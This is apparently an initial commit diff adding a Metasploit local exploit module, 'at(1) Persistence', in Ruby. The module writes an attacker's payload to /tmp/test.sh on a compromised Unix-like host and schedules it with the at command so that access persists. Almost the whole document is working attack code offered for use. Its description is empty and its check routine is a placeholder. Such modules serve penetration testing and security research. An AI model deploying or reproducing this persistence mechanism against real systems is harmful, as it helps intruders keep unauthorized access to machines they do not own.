Initial commit of at(1) 'persistence'

Initial inspiration from @h00die's cron module in #7003

modules/exploits/multi/local/at_persistence.rb

@@ -0,0 +1,61 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Unix
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'at(1) Persistence',
+        'Description'    => %q(
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            'Jon Hart <jon_hart@rapid7.com>'
+          ],
+        'Targets'        => [['Automatic', {} ]],
+        'DefaultTarget'  => 0,
+        'Platform'       => ['unix', 'linux', 'osx'],
+        'Arch'           => ARCH_CMD,
+        'Payload'        =>
+        {
+          'Compat'     =>
+          {
+            'PayloadType'  => 'cmd',
+            'RequiredCmd'  => 'generic perl ruby python'
+          }
+        },
+        'DefaultOptions' => { 'WfsDelay' => 60 },
+        'DisclosureDate' => "Jan 1 1997" # http://pubs.opengroup.org/onlinepubs/007908799/xcu/at.html
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TIME', [false, 'When to run job via at(1).  Changing may require WfsDelay to be adjusted', 'now + 1 minute']),
+        OptBool.new('CLEANUP', [true, 'Delete at entry and payload after execution', true])
+      ]
+    )
+  end
+
+  # TODO: find a better way to determine if the user can use at(1).  cmd_exec doesn't get us stderr or a return code
+  def check
+    cmd_exec("ls -l")
+  end
+
+  def exploit
+    write_file("/tmp/test.sh", payload.encoded)
+    print_status(cmd_exec("at -f /tmp/test.sh #{datastore['TIME']}"))
+    print_status("Waiting #{datastore['WfsDelay']}sec for execution")
+    Rex.sleep(datastore['WfsDelay'].to_i)
+  end
+end